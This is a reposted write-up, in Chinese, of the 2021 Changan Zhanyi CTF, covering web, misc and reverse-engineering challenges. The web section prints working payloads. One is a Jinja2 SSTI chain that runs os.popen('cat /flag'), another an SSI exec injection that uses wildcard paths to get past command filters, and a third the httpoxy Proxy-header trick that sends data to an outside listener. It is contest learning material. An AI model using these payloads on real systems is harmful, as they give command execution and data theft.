[CTF]2021长安战疫 WP

2023-10-31 05:38
文章标签 ctf 2021 wp 长安 战疫

本文主要是介绍[CTF]2021长安战疫 WP,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

前言

这次比赛还是挺有意义的。

WEB

flask

在这里插入图片描述
url结尾要是.js?
直接放payload
在这里插入图片描述

GET /admin?name={{(x|attr(request.cookies.x1)|attr(request.cookies.x2)|attr(request.cookies.x3))(request.cookies.x4).eval(request.cookies.x5)}}&a=.js? 
Cookie: x1=__init__;x2=__globals__;x3=__getitem__;x4=__builtins__;x5=__import__('os').popen('cat /flag').read()

Baby_upload

过滤了很多,但是没有过滤shtml,考虑ssi注入,先试一下这样,发现ls应该是被过滤了
在这里插入图片描述
但是还可以用dir /来看目录下文件,发现有

app home root start.sh bin lib run sys boot lib64 run.sh tmp create_mysql_admin_user.sh media sbin usr dev mnt srv var etc opt start-apache2.sh fffffflllll11111aaaaa4444ggggg proc start-mysqld.sh

很明显的有flag,但是cat tac nl等等读文件的命令都没了,测了一下还有awk,cut,strings.因为fl是被过滤了的,可以用?来匹配,所以可以构造如下payload

cut -b 1-100 ffffffllll?11111aaaaa4444ggggg

还可以

<!--#exec cmd="/???/??? /ffffff?llll11111aaaaa4444ggggg" -->

flag配送中心

一个httpproxy的cve,当我们在请求报文的头加上
Proxy:http://ip:port由于php版本的原因,会自动在Proxy前加上HTTP_,导致漏洞产生,所以只需要加个头,然后在服务器上开启监听即可得到flag
在这里插入图片描述

Misc

八卦迷宫

跟着走就行
在这里插入图片描述

ezsteg

爆破得到密码220101
题目说了steg,py的隐写,用python stegosaurus.py -x steg.pyc
在这里插入图片描述
然后emoji-aes输入密钥即可获得flag

朴实无华的取证

先正常的取证操作
然后
在这里插入图片描述
得到图片
在这里插入图片描述
爆破flag.zip得到密码20211209
然后得到加密脚本

//幼儿园水平的加密(部分)
void Encrypt(string& str)
{for(int i = 0; i < str.length(); i++){if(str[i] >='a'&& str[i]<='w')str[i]+=3;else if(str[i]=='x')str[i]='a';else if(str[i]=='y')str[i]='b';else if(str[i]=='z')str[i]='c';	else if(str[i]=='_')str[i]='|';str[i] -= 32;}
}

解密

s = b"fdcb[8ldq?zloo?fhuwdlqobvxffhhg?lq?iljkwlqj?wkh?hslghplf]"
s = s.upper()
for c in s:c += 32print(chr(c), end='')

然后凯撒,然后猜出flag

ezencrypt

下载一个流量包,导出对象,一串奇怪的数据,base64之后是zip数据流,然后导出zip
用D盾扫描
应该就是个混淆加密,找网站在线解得到

<?php
namespace app\controller;use app\BaseController;class Index extends BaseController
{public function index(){if(!empty($_GET['pop'])){unserialize(base64_decode($_GET['pop']));}return "Welcom To CAZT! Xi'an Come On!";}public function C4zyC0m3On(){return 'cazy{PHP_ji4m1_1s_s00000_3aSyyyyyyyyyyy}';}
}
?>

西安加油

流量包提取数据secret.txt,base64解密后存为文件,压缩包,要拼图。自动拼图即可
在这里插入图片描述

逆向

combat_slogan

jd-gui反编译发现
在这里插入图片描述
rot13解得We_w11l_f1ght_t0_end_t0_end_cazy

cute_doge

shift+f12得到ZmxhZ3tDaDFuYV95eWRzX2Nhenl9…
flag{Ch1na_yyds_cazy}

这篇关于[CTF]2021长安战疫 WP的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/313181

相关文章

GPU 计算 CMPS224 2021 学习笔记 02

并行类型 (1)任务并行 (2)数据并行 CPU & GPU CPU和GPU拥有相互独立的内存空间,需要在两者之间相互传输数据。 (1)分配GPU内存 (2)将CPU上的数据复制到GPU上 (3)在GPU上对数据进行计算操作 (4)将计算结果从GPU复制到CPU上 (5)释放GPU内存 CUDA内存管理API (1)分配内存 cudaErro

2021-8-14 react笔记-2 创建组件 基本用法

1、目录解析 public中的index.html为入口文件 src目录中文件很乱,先整理文件夹。 新建components 放组件 新建assets放资源   ->/images      ->/css 把乱的文件放进去  修改App.js 根组件和index.js入口文件中的引入路径 2、新建组件 在components文件夹中新建[Name].js文件 //组件名首字母大写

2021-08-14 react笔记-1 安装、环境搭建、创建项目

1、环境 1、安装nodejs 2.安装react脚手架工具 //  cnpm install -g create-react-app 全局安装 2、创建项目 create-react-app [项目名称] 3、运行项目 npm strat  //cd到项目文件夹    进入这个页面  代表运行成功  4、打包 npm run build

【CTF Web】BUUCTF Upload-Labs-Linux Pass-13 Writeup(文件上传+PHP+文件包含漏洞+PNG图片马)

Upload-Labs-Linux 1 点击部署靶机。 简介 upload-labs是一个使用php语言编写的,专门收集渗透测试和CTF中遇到的各种上传漏洞的靶场。旨在帮助大家对上传漏洞有一个全面的了解。目前一共20关,每一关都包含着不同上传方式。 注意 1.每一关没有固定的通关方法,大家不要自限思维! 2.本项目提供的writeup只是起一个参考作用,希望大家可以分享出自己的通关思路

[SWPUCTF 2021 新生赛]web方向(一到六题) 解题思路,实操解析,解题软件使用,解题方法教程

题目来源 NSSCTF | 在线CTF平台因为热爱,所以长远!NSSCTF平台秉承着开放、自由、共享的精神,欢迎每一个CTFer使用。https://www.nssctf.cn/problem   [SWPUCTF 2021 新生赛]gift_F12 这个题目简单打开后是一个网页  我们一般按F12或者是右键查看源代码。接着我们点击ctrl+f后快速查找,根据题目给的格式我们搜索c

【面试个人成长】2021年过半,社招和校招的经验之谈

点击上方蓝色字体,选择“设为星标” 回复”资源“获取更多资源 长话短说。 今天有点晚,因为一些事情耽误了,文章发出来有些晚。 周末的时候和一个知识星球的读者1对1指导了一些应届生的学习路径和简历准备。 因为马上就要秋招了,有些公司的提前批已经启动。2021年已经过半了,各位。时间真是太快了。 正好周末抽了一点时间看之前买的关于面试的电子书,针对校招和社招的面试准备和需要注意的点在啰嗦几句。 校

【硬刚大数据之面试篇】2021年从零到大数据专家面试篇之Spark篇

欢迎关注博客主页:https://blog.csdn.net/u013411339 欢迎点赞、收藏、留言 ,欢迎留言交流! 本文由【王知无】原创,首发于 CSDN博客! 本文首发CSDN论坛,未经过官方和本人允许,严禁转载! 本文是对《【硬刚大数据之学习路线篇】2021年从零到大数据专家的学习指南(全面升级版)》的面试部分补充。 硬刚大数据系列文章链接: 2021年从零到大数据专家的

【硬刚大数据之面试篇】2021年从零到大数据专家面试篇之消息队列篇

📢欢迎关注博客主页:https://blog.csdn.net/u013411339 📢欢迎点赞 👍 收藏 ⭐留言 📝 ,欢迎留言交流! 📢本文由【王知无】原创,首发于 CSDN博客! 📢本文首发CSDN论坛,未经过官方和本人允许,严禁转载! 本文是对《【硬刚大数据之学习路线篇】2021年从零到大数据专家的学习指南(全面升级版)》的面试部分补充。 硬刚大数据系列文章链接:

【硬刚大数据之面试篇】2021年从零到大数据专家面试篇之SparkSQL篇

📢欢迎关注博客主页:https://blog.csdn.net/u013411339 📢欢迎点赞 👍 收藏 ⭐留言 📝 ,欢迎留言交流! 📢本文由【王知无】原创,首发于 CSDN博客! 📢本文首发CSDN论坛,未经过官方和本人允许,严禁转载! 本文是对《【硬刚大数据之学习路线篇】2021年从零到大数据专家的学习指南(全面升级版)》的面试部分补充。 硬刚大数据系列文章链接:

【硬刚大数据之面试篇】2021年从零到大数据专家面试篇之Hadoop/HDFS/Yarn篇

📢欢迎关注博客主页:https://blog.csdn.net/u013411339 📢欢迎点赞 👍 收藏 ⭐留言 📝 ,欢迎留言交流! 📢本文由【王知无】原创,首发于 CSDN博客! 📢本文首发CSDN论坛,未经过官方和本人允许,严禁转载! 本文是对《【硬刚大数据之学习路线篇】2021年从零到大数据专家的学习指南(全面升级版)》的面试部分补充。 硬刚大数据系列文章链接: